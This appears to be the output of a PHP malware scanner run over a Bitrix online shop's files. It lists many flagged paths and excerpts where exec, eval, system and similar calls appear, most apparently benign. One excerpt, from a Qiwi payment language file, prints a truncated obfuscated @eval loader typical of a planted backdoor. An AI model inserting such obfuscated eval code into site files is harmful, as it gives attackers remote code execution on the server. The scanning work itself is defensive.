Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec() { $isPost = $this->request->isPost(); $stepName = $this->getStepName(); $state = $this->getState(); if($stepName === $this->getFirstStepName() && !$isPost && $this->isDiscountEditing()) { $state = $this->generateState($this->discount); } if($this->isRunningPrevStep()) { $stepName = $state->getPrevStep(); } if($isPost && !$this->isRunningPrevStep()) { list($state, $nextStep) = $this->runStep($stepName, $state, self::MODE_SAVE); if($stepName != $nextStep) { $state->addStepChain($stepName); ...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/tmp/modules/main/interface/admin_lib.php Size: 180.62 kB Created: 2023-03-11 16:37:52 Modified: 2023-11-27 14:53:29 Warns: 2 Dangers: 1
| Description | Match |
|---|
Exploit execution Line: 358 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/admin/.left.menu.php")
| Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('$a, $b', 'if($a["__sort"] == $b["__sort"]) return 0; return ($a["__sort"] < $b["__sort"])? -1 : 1;')); } foreach($this->aHeaders as $id=>$arHeader) { if(in_array($id, $this->arVisibleColumns)) $this->aVisibleHeaders[$id] = $arHeader; } if (isset($_REQUEST["mode"]) && $_REQUEST["mode"] == "settings") $this->ShowSettings($aAllCols, $aCols, $aOptions); } function ShowSettings($aAllCols, $aCols, $aOptions) { global $USER; require($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/inclu...
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval(this.form.action[this.form.action.selectedIndex].getAttribute('custom_action'));return false;}" disabled="disabled" class="adm-table-action-button" />
<? endif; ?>
<span class="adm-table-counter" id="<?=$this->table_id?>_selected_count"><?=GetMessage('admin_lib_checked')?>: <span>0</span></span>
<? endif; ?>
</div>
<? } function DisplayList($arParams = array()) { $menu = new CAdminPopup($this->table_id."_menu", $this->table_id."_menu"); $menu->Show(); if( (isset($_REQUEST['ajax_debugx']) &...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/delivery/delivery_russianpost.php Size: 205.00 B Created: 2023-03-11 16:37:49 Modified: 2023-11-27 14:53:28 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/delivery/cpcr/cities.php Size: 187.00 B Created: 2023-03-11 16:37:49 Modified: 2023-11-27 14:53:28 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/delivery/cpcr/locations.php Size: 193.00 B Created: 2023-03-11 16:37:49 Modified: 2023-11-27 14:53:28 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/delivery/delivery_ems.php Size: 189.00 B Created: 2023-03-11 16:37:49 Modified: 2023-11-27 14:53:28 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/delivery/delivery_pecom.php Size: 193.00 B Created: 2023-03-11 16:37:49 Modified: 2023-11-27 14:53:28 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/delivery/delivery_ua_post.php Size: 197.00 B Created: 2023-03-11 16:37:49 Modified: 2023-11-27 14:53:28 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/delivery/delivery_rus_post.php Size: 199.00 B Created: 2023-03-11 16:37:49 Modified: 2023-11-27 14:53:28 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/delivery/delivery_kaz_post.php Size: 199.00 B Created: 2023-03-11 16:37:49 Modified: 2023-11-27 14:53:28 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/delivery/delivery_cpcr.php Size: 191.00 B Created: 2023-03-11 16:37:49 Modified: 2023-11-27 14:53:28 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/delivery/russianpost/country.php Size: 203.00 B Created: 2023-03-11 16:37:49 Modified: 2023-11-27 14:53:28 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/delivery/delivery_rus_post_first.php Size: 211.00 B Created: 2023-03-11 16:37:49 Modified: 2023-11-27 14:53:28 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/options.php Size: 96.07 kB Created: 2023-03-11 16:37:49 Modified: 2023-11-27 14:53:28 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 281 Warning Double var technique is usually used for the obfuscation of malicious code |
${$name}
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/handlers/paysystem/yandexreferrer/lang/en/.description.php Size: 2.80 kB Created: 2023-03-11 16:37:46 Modified: 2023-11-27 14:53:28 Warns: 1
| Description | Match |
|---|
Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system (ShopID)"; $MESS["SALE_HPS_YANDEX_SHOP_ID_DESC"] = "Yandex Shop ID"; $MESS["SALE_HPS_YANDEX_SCID"] = "Showcase identifier in payment collector system (scid)"; $MESS["SALE_HPS_YANDEX_SCID_DESC"] = "Showcase identifier in payment collector system (scid)"; $MESS["SALE_HPS_YANDEX_PAYMENT_ID"] = "Payment #"; $MESS["SALE_HPS_YANDEX_SHOP_KEY"] = "Shop Password"; $MESS["SALE_HPS_YANDEX_SHOP_KEY_DESC"] = "Shop password as used on Yandex"; $MESS["SALE_HPS_YANDEX_SHOULD_PAY"] = "Order total"; $MESS[...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/handlers/paysystem/yandex/settings/lang/en/refund.php Size: 2.61 kB Created: 2023-03-11 16:37:46 Modified: 2023-11-27 14:53:28 Warns: 1
| Description | Match |
|---|
Function system Line: 29 Warning Potentially dangerous function `system` [https://www.php.net/system] |
system (ShopID)
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/handlers/paysystem/yandexinvoice/lang/en/.description.php Size: 952.00 B Created: 2023-03-11 16:37:47 Modified: 2023-11-27 14:53:28 Warns: 1
| Description | Match |
|---|
Function system Line: 3 Warning Potentially dangerous function `system` [https://www.php.net/system] |
system (ShopID)
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/handlers/paysystem/qiwi/lang/ua/themes.php Size: 81.43 kB Created: 2019-09-11 10:35:25 Modified: 2023-11-27 14:53:28 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit silenced_eval Line: 12 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine |
@eval($Éßé¾ê…($¾ê($ãõà·,'',$éÉ‹ß…æê('W6auMTM62tn2TRXX’T2tu’t’bŽN–’AžhŸCƒŠ62XTK€mG82MOQ‡nZO2sG8VehGC’’+‰ p+nWAA•Ac’GŠsVƒOC7‰At SUN=scndZaxŽCaZƒ8–›nˆRŠtœy n– 8NCXv•nGW‰=’ue‰‘=oƒNœt–UœpORURŠAœe€x=–m K›ŠŽ€2aWš‰ Wk ŠvMŽM’€OU=MpMˆŽe+UŽaAŸNRp–N•‰A8€m––u+8ŸxpmžœNGŽe‰Ž–Ÿƒvuƒsc–žcSaxQWšdOžWvKCRd+S’‰= R7=CeX8žyuŸuemšAŠ–NZ+UyŠCž6XŽ€PvdSs‡€k=Wcc+•a‡8SœKž+N8Š7m8œ‰p‹8Ve‹Žxt–+xhT','m“9L™O+aXv= ž/Œ˜’Žc•3”db€WhFHt–—2EP7‹5ŸšnS…TfA‰lqxƒC‘wg‚84o0jyVZr›YuŠB„DUIJœˆzkKNeM1RGp‡6†iQs'...
| Function eval Line: 12 Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval($Éßé¾ê…($¾ê($ãõà·,'',$éÉ‹ß…æê('W6auMTM62tn2TRXX’T2tu’t’bŽN–’AžhŸCƒŠ62XTK€mG82MOQ‡nZO2sG8VehGC’’+‰ p+nWAA•Ac’GŠsVƒOC7‰At SUN=scndZaxŽCaZƒ8–›nˆRŠtœy n– 8NCXv•nGW‰=’ue‰‘=oƒNœt–UœpORURŠAœe€x=–m K›ŠŽ€2aWš‰ Wk ŠvMŽM’€OU=MpMˆŽe+UŽaAŸNRp–N•‰A8€m––u+8ŸxpmžœNGŽe‰Ž–Ÿƒvuƒsc–žcSaxQWšdOžWvKCRd+S’‰= R7=CeX8žyuŸuemšAŠ–NZ+UyŠCž6XŽ€PvdSs‡€k=Wcc+•a‡8SœKž+N8Š7m8œ‰p‹8Ve‹Žxt–+xhT','m“9L™O+aXv= ž/Œ˜’Žc•3”db€WhFHt–—2EP7‹5ŸšnS…TfA‰lqxƒC‘wg‚84o0jyVZr›YuŠB„DUIJœˆzkKNeM1RGp‡6†iQs',...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/reports/waybill.php Size: 252.00 B Created: 2023-03-11 16:37:45 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/reports/order_form.php Size: 258.00 B Created: 2023-03-11 16:37:45 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/reports/factura.php Size: 252.00 B Created: 2023-03-11 16:37:45 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/reports/invoice.php Size: 252.00 B Created: 2023-03-11 16:37:45 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/general/sale_report_helper.php Size: 109.98 kB Created: 2023-03-11 16:37:34 Modified: 2023-11-27 14:53:28 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit execution Line: 973 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/sale/install/version.php")
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval( 'function ___dbCastIntToChar($dbtype, $param)'. '{'. ' $result = $param;'. ' if (ToLower($dbtype) === "mssql")'. ' {'. ' $result = "CAST(".$param." AS VARCHAR)";'. ' }'. ' return $result;'. '}' ); } if (self::$bUsePriceTypesColumns) { foreach (self::$priceTypes as $id => $info) { if ($info['selected'] === true) { $fieldName = 'PRICE_TYPE_'.$id; $runtime[$fieldName] = array( 'data_type' => 'string', 'expression' => array('
(SELECT '.$DB->Concat(___dbCastIntToChar($DBType...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/general/discount.php Size: 53.68 kB Created: 2023-03-11 16:37:34 Modified: 2023-11-27 14:53:28 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval('$checkOrder='.$strUnpack.';'); if (!is_callable($checkOrder)) return false; $boolRes = $checkOrder($arOrder); unset($checkOrder); return $boolRes; } protected function __ApplyActions(&$arOrder, $strActions) { $applyOrder = null; if (!empty($strActions)) { eval('$applyOrder='.$strActions.';'); if (is_callable($applyOrder)) $applyOrder($arOrder); } } protected static function __ConvertOldFormat($strAction, &$arFields) { global $APPLICATION; $arMsg = array(); $boolResult = true; $arNeedFields...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/general/order.php Size: 105.53 kB Created: 2023-03-11 16:37:34 Modified: 2023-11-27 14:53:28 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function("&\$item", "\$item=IntVal(\$item);")); $vals = array_unique($vals); $val = implode(",", $vals); if (count($vals) <= 0) $arSqlSearch_tmp[] = "(1 = 2)"; else $arSqlSearch_tmp[] = (($strNegative == "Y") ? " NOT " : "")."(".$arFields[$key]["FIELD"]." IN (".$val."))"; } elseif ($arFields[$key]["TYPE"] == "double") { array_walk($vals, create_function("&\$item", "\$item=DoubleVal(\$item);")); $vals = array_unique($vals); $val = implode(",", $vals); if (count($vals) <= 0) $arSqlSearch_tm...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/bill_ua/.description.php Size: 278.00 B Created: 2023-03-11 16:37:50 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/bill_ua/en/bill.php Size: 193.00 B Created: 2023-03-11 16:37:50 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/bill_ua/payment.php Size: 275.00 B Created: 2023-03-11 16:37:50 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/bill_ua/ru/bill.php Size: 194.00 B Created: 2023-03-11 16:37:50 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/webmoney/.description.php Size: 280.00 B Created: 2023-03-11 16:37:52 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/webmoney/en/webmoney.php Size: 203.00 B Created: 2023-03-11 16:37:52 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/webmoney/payment.php Size: 270.00 B Created: 2023-03-11 16:37:52 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/webmoney/ru/webmoney.php Size: 203.00 B Created: 2023-03-11 16:37:52 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/webmoney_pci/.description.php Size: 288.00 B Created: 2023-03-11 16:37:51 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/webmoney_pci/en/webmoney_pci.php Size: 219.00 B Created: 2023-03-11 16:37:51 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/webmoney_pci/payment.php Size: 278.00 B Created: 2023-03-11 16:37:51 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/webmoney_pci/result.php Size: 276.00 B Created: 2023-03-11 16:37:51 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/webmoney_pci/result_rec.php Size: 284.00 B Created: 2023-03-11 16:37:51 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/webmoney_pci/ru/webmoney_pci.php Size: 219.00 B Created: 2023-03-11 16:37:51 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/binom/.description.php Size: 274.00 B Created: 2023-03-11 16:37:51 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/binom/en/payment.php Size: 195.00 B Created: 2023-03-11 16:37:51 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/binom/payment.php Size: 264.00 B Created: 2023-03-11 16:37:51 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/binom/ru/payment.php Size: 195.00 B Created: 2023-03-11 16:37:51 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/yandex/.description.php Size: 276.00 B Created: 2023-03-11 16:37:50 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/yandex/en/payment.php Size: 197.00 B Created: 2023-03-11 16:37:50 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/yandex/payment.php Size: 266.00 B Created: 2023-03-11 16:37:50 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/yandex/result_rec.php Size: 272.00 B Created: 2023-03-11 16:37:50 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/yandex/ru/payment.php Size: 197.00 B Created: 2023-03-11 16:37:50 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/bill/.description.php Size: 272.00 B Created: 2023-03-11 16:37:51 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/bill/en/bill.php Size: 187.00 B Created: 2023-03-11 16:37:51 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/bill/payment.php Size: 269.00 B Created: 2023-03-11 16:37:51 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/bill/ru/bill.php Size: 188.00 B Created: 2023-03-11 16:37:51 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/payflow_pro/pre_payment.php Size: 8.22 kB Created: 2023-03-11 16:37:51 Modified: 2023-11-27 14:53:29 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec($ret_com, $arOutput, $ret_var); $strOutput = $arOutput[0]; parse_str($strOutput, $arResult); if (is_array($arResult) && strlen($arResult["RESULT"])>0) { $arPaySysResult = array( "PS_STATUS" => (($arResult["RESULT"] == 0) ? "Y" : "N"), "PS_STATUS_CODE" => $arResult["RESULT"], "PS_STATUS_DESCRIPTION" => $arResult["RESPMSG"]." - ".$arResult["PREFPSMSG"], "PS_STATUS_MESSAGE" => $arResult["PNREF"], "PS_SUM" => $AMT, "PS_CURRENCY" => "USD", "PS_RESPONSE_DATE" => Date(CDatabase::DateFormatToPHP(CL...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/payflow_pro/payment.php Size: 9.77 kB Created: 2023-03-11 16:37:51 Modified: 2023-11-27 14:53:29 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec($ret_com, $arOutput, $ret_var); $strOutput = $arOutput[0]; parse_str($strOutput, $arResult); if (is_array($arResult) && strlen($arResult["RESULT"])>0) { $arFields = array( "PS_STATUS" => (($arResult["RESULT"]==0) ? "Y" : "N"), "PS_STATUS_CODE" => $arResult["RESULT"], "PS_STATUS_DESCRIPTION" => $arResult["RESPMSG"]." - ".$arResult["PREFPSMSG"], "PS_STATUS_MESSAGE" => $arResult["PNREF"], "PS_RESPONSE_DATE" => Date(CDatabase::DateFormatToPHP(CLang::GetDateFormat("FULL", LANG))) ); $arResult["R...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/payflow_pro/action.php Size: 5.77 kB Created: 2023-03-11 16:37:51 Modified: 2023-11-27 14:53:29 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec($ret_com, $arOutput, $ret_var); $strOutput = $arOutput[0]; parse_str($strOutput, $arResult); if (is_array($arResult) && strlen($arResult["RESULT"])>0) { $OUTPUT_STATUS = (($arResult["RESULT"] == 0) ? "Y" : "N"); $OUTPUT_STATUS_CODE = $arResult["RESULT"]; $OUTPUT_STATUS_DESCRIPTION = $arResult["RESPMSG"]." - ".$arResult["PREFPSMSG"]; $OUTPUT_STATUS_MESSAGE = $arResult["PNREF"]; $OUTPUT_SUM = $INPUT_SUM; $OUTPUT_CURRENCY = "USD"; $OUTPUT_RESPONSE_DATE = Date(CDatabase::DateFormatToPHP(CLang::...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/liqpay/result_rec.php Size: 1.31 kB Created: 2023-03-11 16:37:51 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/sberbank_new/.description.php Size: 288.00 B Created: 2023-03-11 16:37:52 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/sberbank_new/payment.php Size: 278.00 B Created: 2023-03-11 16:37:52 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/yandex_3x/.description.php Size: 282.00 B Created: 2023-03-11 16:37:52 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/yandex_3x/en/payment.php Size: 203.00 B Created: 2023-03-11 16:37:52 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/yandex_3x/payment.php Size: 272.00 B Created: 2023-03-11 16:37:52 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/yandex_3x/result_rec.php Size: 278.00 B Created: 2023-03-11 16:37:52 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/yandex_3x/ru/payment.php Size: 203.00 B Created: 2023-03-11 16:37:52 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/sberbank/.description.php Size: 280.00 B Created: 2023-03-11 16:37:50 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/sberbank/en/sberbank.php Size: 203.00 B Created: 2023-03-11 16:37:50 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/sberbank/payment.php Size: 270.00 B Created: 2023-03-11 16:37:50 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/sberbank/ru/sberbank.php Size: 203.00 B Created: 2023-03-11 16:37:50 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/z_payment/.description.php Size: 282.00 B Created: 2023-03-11 16:37:49 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/z_payment/en/z_payment.php Size: 207.00 B Created: 2023-03-11 16:37:50 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/z_payment/z_payment_result.php Size: 290.00 B Created: 2023-03-11 16:37:49 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/z_payment/payment.php Size: 272.00 B Created: 2023-03-11 16:37:49 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/z_payment/ru/z_payment.php Size: 207.00 B Created: 2023-03-11 16:37:49 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/worldpay/.description.php Size: 3.71 kB Created: 2023-03-11 16:37:50 Modified: 2023-11-27 14:53:29 Warns: 1
| Description | Match |
|---|
Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
System (via http://www.worldpay.com/admin). In the new window that "; $psDescription .= "opens you will need to scroll down to the section headed Installations and select the Configuration options button corresponding to the instId you are using.<br>"; $psDescription .= "You need to complete the following settings:<br>"; $psDescription .= "- <b>Callback URL</b><br>This should be set to the complete address to your callback URL (this file), hosted on your server.<br>"; $psDescription .= "You shou...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/impexbank/.description.php Size: 282.00 B Created: 2023-03-11 16:37:50 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/impexbank/en/impexbank.php Size: 207.00 B Created: 2023-03-11 16:37:50 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/impexbank/payment.php Size: 272.00 B Created: 2023-03-11 16:37:50 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/impexbank/ru/impexbank.php Size: 207.00 B Created: 2023-03-11 16:37:50 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/oshadbank/.description.php Size: 282.00 B Created: 2023-03-11 16:37:52 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/oshadbank/payment.php Size: 272.00 B Created: 2023-03-11 16:37:52 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/kreditpilot/.description.php Size: 286.00 B Created: 2023-03-11 16:37:50 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/kreditpilot/en/payment.php Size: 207.00 B Created: 2023-03-11 16:37:50 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/kreditpilot/payment.php Size: 276.00 B Created: 2023-03-11 16:37:50 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/kreditpilot/ru/payment.php Size: 207.00 B Created: 2023-03-11 16:37:50 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/webmoney_web/.description.php Size: 288.00 B Created: 2023-03-11 16:37:50 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/webmoney_web/en/webmoney_web.php Size: 219.00 B Created: 2023-03-11 16:37:50 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/webmoney_web/payment.php Size: 278.00 B Created: 2023-03-11 16:37:50 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/webmoney_web/result_rec.php Size: 284.00 B Created: 2023-03-11 16:37:50 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/webmoney_web/ru/webmoney_web.php Size: 219.00 B Created: 2023-03-11 16:37:50 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/bill_la/.description.php Size: 281.00 B Created: 2023-03-11 16:37:50 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/bill_la/en/bill.php Size: 193.00 B Created: 2023-03-11 16:37:50 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/bill_la/payment.php Size: 275.00 B Created: 2023-03-11 16:37:50 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/bill_la/la/bill.php Size: 194.00 B Created: 2023-03-11 16:37:50 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/post/.description.php Size: 272.00 B Created: 2023-03-11 16:37:50 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/post/en/post.php Size: 187.00 B Created: 2023-03-11 16:37:50 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/post/payment.php Size: 262.00 B Created: 2023-03-11 16:37:50 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/post/ru/post.php Size: 187.00 B Created: 2023-03-11 16:37:50 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/moneymail/.description.php Size: 282.00 B Created: 2023-03-11 16:37:50 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/moneymail/en/payment.php Size: 203.00 B Created: 2023-03-11 16:37:50 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/moneymail/payment.php Size: 273.00 B Created: 2023-03-11 16:37:50 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/moneymail/result.php Size: 270.00 B Created: 2023-03-11 16:37:50 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/moneymail/result_rec.php Size: 279.00 B Created: 2023-03-11 16:37:50 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/moneymail/ru/payment.php Size: 203.00 B Created: 2023-03-11 16:37:50 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/paymaster/.description.php Size: 285.00 B Created: 2023-03-11 16:37:50 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/sale/payment/paymaster/en/paymaster.php Size: 207.00 B Created: 2023-03-11 16:37:50 Modified: 2023-11-27 14:53:29 Dangers: 1
|
